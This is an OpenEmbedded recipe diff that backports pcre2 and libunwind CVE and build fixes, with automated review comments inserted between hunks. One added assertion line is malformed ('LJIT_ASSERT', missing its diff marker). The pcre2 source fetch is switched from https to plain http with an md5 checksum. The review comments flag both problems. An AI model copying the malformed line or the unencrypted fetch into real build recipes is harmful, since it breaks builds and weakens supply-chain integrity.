++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ }
+ cc += 1 + LINK_SIZE;
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc))
+- {
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ private_count = 1;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- }
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+ if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2564,11 +2631,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
++ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+@@ -2577,11 +2645,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
++ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 2 + IMM2_SIZE;
+ #ifdef SUPPORT_UNICODE
+@@ -2590,30 +2659,30 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc))
+- {
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ private_count = 1;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- }
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 1 + IMM2_SIZE;
+ break;
+@@ -2630,14 +2699,17 @@ while (cc < ccend)
+ switch(get_class_iterator_size(cc + i))
+ {
+ case 1:
+- private_count = 1;
+ private_srcw[0] = PRIVATE_DATA(cc);
+ break;
+
+ case 2:
+- private_count = 2;
+ private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ if (recurse_check_bit(common, private_srcw[0]))
++ {
++ private_count = 2;
++ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
++ }
+ break;
+
+ default:
+@@ -2652,28 +2724,25 @@ while (cc < ccend)
+ case OP_PRUNE_ARG:
+ case OP_THEN_ARG:
+ SLJIT_ASSERT(common->mark_ptr != 0);
+- if (has_quit && !setmark_found)
++ if (has_quit && recurse_check_bit(common, common->mark_ptr))
+ {
+ kept_shared_srcw[0] = common->mark_ptr;
+ kept_shared_count = 1;
+- setmark_found = TRUE;
+ }
+- if (common->control_head_ptr != 0 && !control_head_found)
++ if (common->control_head_ptr != 0 && recurse_check_bit(common, common->control_head_ptr))
+ {
+ shared_srcw[0] = common->control_head_ptr;
+ shared_count = 1;
+- control_head_found = TRUE;
+ }
+ cc += 1 + 2 + cc[1];
+ break;
+
+ case OP_THEN:
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+- if (!control_head_found)
++ if (recurse_check_bit(common, common->control_head_ptr))
+ {
+ shared_srcw[0] = common->control_head_ptr;
+ shared_count = 1;
+- control_head_found = TRUE;
+ }
+ cc++;
+ break;
+@@ -2681,7 +2750,7 @@ while (cc < ccend)
+ default:
+ cc = next_opcode(common, cc);
+ SLJIT_ASSERT(cc != NULL);
+- break;
++ continue;
+ }
+
+ if (type != recurse_copy_shared_to_global && type != recurse_copy_kept_shared_to_global)
+@@ -13262,7 +13331,7 @@ SLJIT_ASSERT(!(common->req_char_ptr != 0 && common->start_used_ptr != 0));
+ common->cbra_ptr = OVECTOR_START + (re->top_bracket + 1) * 2 * sizeof(sljit_sw);
+
+ total_length = ccend - common->start;
+-common->private_data_ptrs = (sljit_s32 *)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
++common->private_data_ptrs = (sljit_s32*)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
+ if (!common->private_data_ptrs)
+ {
+ SLJIT_FREE(common->optimized_cbracket, allocator_data);
+@@ -13304,6 +13373,7 @@ if (!compiler)
+ common->compiler = compiler;
+
+ /* Main pcre_jit_exec entry. */
++LJIT_ASSERT((private_data_size & (sizeof(sljit_sw) - 1)) == 0);
+ sljit_emit_enter(compiler, 0, SLJIT_ARG1(SW), 5, 5, 0, 0, private_data_size);
+
+ /* Register init. */
+@@ -13524,20 +13594,40 @@ common->fast_fail_end_ptr = 0;
+ common->currententry = common->entries;
+ common->local_quit_available = TRUE;
+ quit_label = common->quit_label;
+-while (common->currententry != NULL)
++if (common->currententry != NULL)
+ {
+- /* Might add new entries. */
+- compile_recurse(common);
+- if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
++ /* A free bit for each private data. */
++ common->recurse_bitset_size = ((private_data_size / (int)sizeof(sljit_sw)) + 7) >> 3;
++ SLJIT_ASSERT(common->recurse_bitset_size > 0);
++ common->recurse_bitset = (sljit_u8*)SLJIT_MALLOC(common->recurse_bitset_size, allocator_data);;
++
++ if (common->recurse_bitset != NULL)
++ {
++ do
++ {
++ /* Might add new entries. */
++ compile_recurse(common);
++ if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
++ break;
++ flush_stubs(common);
++ common->currententry = common->currententry->next;
++ }
++ while (common->currententry != NULL);
++
++ SLJIT_FREE(common->recurse_bitset, allocator_data);
++ }
++
++ if (common->currententry != NULL)
+ {
++ /* The common->recurse_bitset has been freed. */
++ SLJIT_ASSERT(sljit_get_compiler_error(compiler) || common->recurse_bitset == NULL);
++
+ sljit_free_compiler(compiler);
+ SLJIT_FREE(common->optimized_cbracket, allocator_data);
+ SLJIT_FREE(common->private_data_ptrs, allocator_data);
+ PRIV(jit_free_rodata)(common->read_only_data_head, allocator_data);
+ return PCRE2_ERROR_NOMEMORY;
+ }
+- flush_stubs(common);
+- common->currententry = common->currententry->next;
+ }
+ common->local_quit_available = FALSE;
+ common->quit_label = quit_label;
+diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
+index 9df87fd..2f84834 100644
+--- a/src/pcre2_jit_test.c
++++ b/src/pcre2_jit_test.c
+@@ -746,6 +746,7 @@ static struct regression_test_case regression_test_cases[] = {
+ { MU, A, 0, 0, "((?(R)a|(?1)){1,3}?)M", "aaaM" },
+ { MU, A, 0, 0, "((.)(?:.|\\2(?1))){0}#(?1)#", "#aabbccdde# #aabbccddee#" },
+ { MU, A, 0, 0, "((.)(?:\\2|\\2{4}b)){0}#(?:(?1))+#", "#aaaab# #aaaaab#" },
++ { MU, A, 0, 0 | F_NOMATCH, "(?1)$((.|\\2xx){1,2})", "abc" },
+
+ /* 16 bit specific tests. */
+ { CM, A, 0, 0 | F_FORCECONV, "\xc3\xa1", "\xc3\x81\xc3\xa1" },
+--
+2.25.1
+
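Review bot: The assertion added just before `sljit_emit_enter` in the last `pcre2_jit_compile.c` hunk of this patch reads `LJIT_ASSERT(...)` and, as shown here, carries no inner `+` marker, although the hunk header counts one added line and every other assertion in the patch is spelled `SLJIT_ASSERT`. The line looks truncated at its start and should read `+SLJIT_ASSERT((private_data_size & (sizeof(sljit_sw) - 1)) == 0);`. The check matters because `recurse_check_bit` indexes `common->recurse_bitset` by `bit_index >> SLJIT_WORD_SHIFT` with no bounds test, relying on the bitset having been sized from a word-aligned `private_data_size`. Separately, the second slot of each pair is marked only inside `SLJIT_ASSERT(recurse_check_bit(...))`, so if that macro expands to nothing in non-debug builds (its definition is not in the patch) the bit is never set there; a short comment stating that this is intended would help.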
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
new file mode 100644
index 0000000000..882277ae73
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
@@ -0,0 +1,74 @@
+From 94e1c001761373b7d9450768aa15d04c25547a35 Mon Sep 17 00:00:00 2001
+From: Philip Hazel <Philip.Hazel@gmail.com>
+Date: Tue, 16 Aug 2022 17:00:45 +0100
+Subject: [PATCH] Diagnose negative repeat value in pcre2test subject line
+
+CVE: CVE-2022-41409
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ ChangeLog | 3 +++
+ src/pcre2test.c | 4 ++--
+ testdata/testinput2 | 3 +++
+ testdata/testoutput2 | 4 ++++
+ 4 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index eab50eb7..276eb57a 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -7,6 +7,9 @@ fully read in caseless matching.
+ 24. Fixed an issue affecting recursions in JIT caused by duplicated data
+ transfers.
+
++20. A negative repeat value in a pcre2test subject line was not being
++diagnosed, leading to infinite looping.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2test.c b/src/pcre2test.c
+index 08f86096..f6f5d66c 100644
+--- a/src/pcre2test.c
++++ b/src/pcre2test.c
+@@ -6700,9 +6700,9 @@ while ((c = *p++) != 0)
+ }
+
+ i = (int32_t)li;
+- if (i-- == 0)
++ if (i-- <= 0)
+ {
+- fprintf(outfile, "** Zero repeat not allowed\n");
++ fprintf(outfile, "** Zero or negative repeat not allowed\n");
+ return PR_OK;
+ }
+
+diff --git a/testdata/testinput2 b/testdata/testinput2
+index 655e519..14e00ed 100644
+--- a/testdata/testinput2
++++ b/testdata/testinput2
+@@ -5772,4 +5772,7 @@ a)"xI
+ /(a)?a/I
+ manm
+
++--
++ \[X]{-10}
++
+ # End of testinput2
+diff --git a/testdata/testoutput2 b/testdata/testoutput2
+index c733c12..958f246 100644
+--- a/testdata/testoutput2
++++ b/testdata/testoutput2
+@@ -17435,6 +17435,10 @@ Subject length lower bound = 1
+ manm
+ 0: a
+
++--
++ \[X]{-10}
++** Zero or negative repeat not allowed
++
+ # End of testinput2
+ Error -70: PCRE2_ERROR_BADDATA (unknown error number)
+ Error -62: bad serialized data
diff --git a/meta/recipes-support/libpcre/libpcre2_10.34.bb b/meta/recipes-support/libpcre/libpcre2_10.34.bb
index fa8655e027..53277270d2 100644
--- a/meta/recipes-support/libpcre/libpcre2_10.34.bb
+++ b/meta/recipes-support/libpcre/libpcre2_10.34.bb
@@ -10,8 +10,12 @@ SECTION = "devel"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37"
-SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre2-${PV}.tar.bz2 \
+SRC_URI = "http://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \
file://pcre-cross.patch \
+ file://CVE-2022-1586.patch \
+ file://CVE-2022-1586-regression.patch \
+ file://CVE-2022-1587.patch \
+ file://CVE-2022-41409.patch \
"
SRC_URI[md5sum] = "d280b62ded13f9ccf2fac16ee5286366"
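Review bot: The new `SRC_URI` fetches the tarball over plain `http://` where the removed line used `https://`, so the download is no longer protected in transit and its integrity rests entirely on the recipe checksums. Only `SRC_URI[md5sum]` is visible in this hunk; a `SRC_URI[sha256sum]` presumably follows outside it and should be confirmed, since MD5 alone is not collision-resistant. I would keep TLS on the mirror URL, `SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \`, assuming the mirror serves HTTPS.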
diff --git a/meta/recipes-support/libpcre/libpcre_8.44.bb b/meta/recipes-support/libpcre/libpcre_8.44.bb
index e5471e81da..3267c5ad72 100644
--- a/meta/recipes-support/libpcre/libpcre_8.44.bb
+++ b/meta/recipes-support/libpcre/libpcre_8.44.bb
@@ -7,8 +7,7 @@ HOMEPAGE = "http://www.pcre.org"
SECTION = "devel"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e"
-SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre-${PV}.tar.bz2 \
- file://fix-pcre-name-collision.patch \
+SRC_URI = "${SOURCEFORGE_MIRROR}/pcre/pcre-${PV}.tar.bz2 \
file://run-ptest \
file://Makefile \
"
diff --git a/meta/recipes-support/libproxy/libproxy_0.4.15.bb b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
index 6f704d7a91..6c7d5a68a1 100644
--- a/meta/recipes-support/libproxy/libproxy_0.4.15.bb
+++ b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
@@ -1,4 +1,8 @@
SUMMARY = "Library providing automatic proxy configuration management"
+DESCRIPTION = "libproxy provides interfaces to get the proxy that will be \
+used to access network resources. It uses various plugins to get proxy \
+configuration via different mechanisms (e.g. environment variables or \
+desktop settings)."
HOMEPAGE = "https://github.com/libproxy/libproxy"
BUGTRACKER = "https://github.com/libproxy/libproxy/issues"
SECTION = "libs"
diff --git a/meta/recipes-support/libpsl/libpsl_0.21.0.bb b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
index 9831b4b94f..66e64f785c 100644
--- a/meta/recipes-support/libpsl/libpsl_0.21.0.bb
+++ b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
@@ -1,4 +1,10 @@
SUMMARY = "Public Suffix List library"
+DESCRIPTION = "The libpsl package provides a library for accessing and \
+resolving information from the Public Suffix List (PSL). The PSL is a set of \
+domain names beyond the standard suffixes, such as .com."
+
+HOMEPAGE = "https://rockdaboot.github.io/libpsl/"
+BUGTRACKER = "https://github.com/rockdaboot/libpsl/issues"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=5437030d9e4fbe7267ced058ddb8a7f5 \
@@ -13,11 +19,10 @@ SRC_URI[sha256sum] = "41bd1c75a375b85c337b59783f5deb93dbb443fb0a52d257f403df7bd6
UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases"
-DEPENDS = "libidn2"
-
inherit autotools gettext gtk-doc manpages pkgconfig lib_package
-PACKAGECONFIG ??= ""
+PACKAGECONFIG ?= "idn2"
PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native"
-
+PACKAGECONFIG[icu] = "--enable-runtime=libicu --enable-builtin=libicu,,icu"
+PACKAGECONFIG[idn2] = "--enable-runtime=libidn2 --enable-builtin=libidn2,,libidn2 libunistring"
BBCLASSEXTEND = "native nativesdk"
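Review bot: `PACKAGECONFIG[icu]` and `PACKAGECONFIG[idn2]` both pass `--enable-runtime=` and `--enable-builtin=`, and neither has a disable argument, which is not documented in the recipe. Enabling both hands configure two conflicting values, and enabling neither leaves the choice to configure's own detection, so the IDNA backend is only deterministic when exactly one is selected. A comment above the two lines would make that explicit, e.g. `# icu and idn2 are mutually exclusive; select exactly one IDNA backend`.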
diff --git a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
index 6731b3373e..e42ac30bf2 100644
--- a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
+++ b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
@@ -1,11 +1,13 @@
SUMMARY = "An HTTP library implementation in C"
+DESCRIPTION = "libsoup is an HTTP client/server library for GNOME. It uses GObjects \
+and the glib main loop, to integrate well with GNOME applications."
HOMEPAGE = "https://wiki.gnome.org/Projects/libsoup"
BUGTRACKER = "https://bugzilla.gnome.org/"
SECTION = "x11/gnome/libs"
LICENSE = "LGPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2"
-DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 intltool-native libpsl"
+DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 libpsl"
SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}"
@@ -40,4 +42,4 @@ DEBIAN_NOAUTONAME_${PN} = "1"
# glib-networking is needed for SSL, proxies, etc.
RRECOMMENDS_${PN} = "glib-networking"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/libunistring/libunistring_0.9.10.bb b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
index 97fac4ecfa..2197b6656d 100644
--- a/meta/recipes-support/libunistring/libunistring_0.9.10.bb
+++ b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
@@ -18,6 +18,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=6a6a8e020838b23406c81b19c1d46df6 \
file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \
file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \
"
+DEPENDS = "gperf-native"
SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \
file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \
diff --git a/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
new file mode 100644
index 0000000000..34a1f46b0f
--- /dev/null
+++ b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
@@ -0,0 +1,420 @@
+From 51112447b316813ad1ae50ea66feca4eb755a424 Mon Sep 17 00:00:00 2001
+From: Yichao Yu <yyc1992@gmail.com>
+Date: Tue, 31 Mar 2020 00:43:32 -0400
+Subject: [PATCH] Fix compilation with -fno-common.
+
+[Khem Raj]
+Making all other archs consistent with IA64 which should not have this problem.
+Also move the FIXME to the correct place.
+
+Also add some minimum comments about this...
+
+[Philippe Coval]
+
+Patch ported to v1.3-stable branch,
+patch to be used used in openembedded-core dunfell branch (on v1.3.1)
+for oniro project.
+
+Upstream-Status: Backport [https://github.com/libunwind/libunwind/pull/166]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Thanks-to: Yichao Yu <yyc1992@gmail.com>
+Origin: https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e
+Relate-to: https://booting.oniroproject.org/distro/oniro/-/issues/191
+Forwarded: https://github.com/libunwind/libunwind/pull/312
+Last-Update: 2021-11-25
+Signed-off-by: Philippe Coval <philippe.coval@huawei.com>
+---
+ src/aarch64/Ginit.c | 15 +++++++--------
+ src/arm/Ginit.c | 15 +++++++--------
+ src/coredump/_UPT_get_dyn_info_list_addr.c | 5 +++++
+ src/hppa/Ginit.c | 15 +++++++--------
+ src/ia64/Ginit.c | 1 +
+ src/mi/Gfind_dynamic_proc_info.c | 1 +
+ src/mips/Ginit.c | 15 +++++++--------
+ src/ppc32/Ginit.c | 11 +++++++----
+ src/ppc64/Ginit.c | 11 +++++++----
+ src/ptrace/_UPT_get_dyn_info_list_addr.c | 5 +++++
+ src/sh/Ginit.c | 15 +++++++--------
+ src/tilegx/Ginit.c | 15 +++++++--------
+ src/x86/Ginit.c | 15 +++++++--------
+ src/x86_64/Ginit.c | 15 +++++++--------
+ 14 files changed, 82 insertions(+), 72 deletions(-)
+
+diff --git a/src/aarch64/Ginit.c b/src/aarch64/Ginit.c
+index 9c4eae82..cb954b15 100644
+--- a/src/aarch64/Ginit.c
++++ b/src/aarch64/Ginit.c
+@@ -61,13 +61,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -78,7 +71,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/arm/Ginit.c b/src/arm/Ginit.c
+index 2720d063..0bac0d72 100644
+--- a/src/arm/Ginit.c
++++ b/src/arm/Ginit.c
+@@ -57,18 +57,17 @@ tdep_uc_addr (unw_tdep_context_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/coredump/_UPT_get_dyn_info_list_addr.c b/src/coredump/_UPT_get_dyn_info_list_addr.c
+index 0d119055..739ed056 100644
+--- a/src/coredump/_UPT_get_dyn_info_list_addr.c
++++ b/src/coredump/_UPT_get_dyn_info_list_addr.c
+@@ -74,6 +74,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+
+ #else
+
++/* XXX fix me: there is currently no way to locate the dyn-info list
++ by a remote unwinder. On ia64, this is done via a special
++ unwind-table entry. Perhaps something similar can be done with
++ DWARF2 unwind info. */
++
+ static inline int
+ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+ int *countp)
+diff --git a/src/hppa/Ginit.c b/src/hppa/Ginit.c
+index 461e4b93..265455a6 100644
+--- a/src/hppa/Ginit.c
++++ b/src/hppa/Ginit.c
+@@ -64,13 +64,6 @@ _Uhppa_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -81,7 +74,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ia64/Ginit.c b/src/ia64/Ginit.c
+index b09a2ad5..8601bb3c 100644
+--- a/src/ia64/Ginit.c
++++ b/src/ia64/Ginit.c
+@@ -68,6 +68,7 @@ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ if (!_U_dyn_info_list_addr)
+ return -UNW_ENOINFO;
+ #endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+diff --git a/src/mi/Gfind_dynamic_proc_info.c b/src/mi/Gfind_dynamic_proc_info.c
+index 98d35012..2e7c62e5 100644
+--- a/src/mi/Gfind_dynamic_proc_info.c
++++ b/src/mi/Gfind_dynamic_proc_info.c
+@@ -49,6 +49,7 @@ local_find_proc_info (unw_addr_space_t as, unw_word_t ip, unw_proc_info_t *pi,
+ return -UNW_ENOINFO;
+ #endif
+
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
+ list = (unw_dyn_info_list_t *) (uintptr_t) _U_dyn_info_list_addr ();
+ for (di = list->first; di; di = di->next)
+ if (ip >= di->start_ip && ip < di->end_ip)
+diff --git a/src/mips/Ginit.c b/src/mips/Ginit.c
+index 3df170c7..bf7a8f5a 100644
+--- a/src/mips/Ginit.c
++++ b/src/mips/Ginit.c
+@@ -69,13 +69,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -86,7 +79,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ppc32/Ginit.c b/src/ppc32/Ginit.c
+index ba302448..7b454558 100644
+--- a/src/ppc32/Ginit.c
++++ b/src/ppc32/Ginit.c
+@@ -91,9 +91,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -104,7 +101,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ppc64/Ginit.c b/src/ppc64/Ginit.c
+index 4c88cd6e..7bfb395a 100644
+--- a/src/ppc64/Ginit.c
++++ b/src/ppc64/Ginit.c
+@@ -95,9 +95,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -108,7 +105,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ptrace/_UPT_get_dyn_info_list_addr.c b/src/ptrace/_UPT_get_dyn_info_list_addr.c
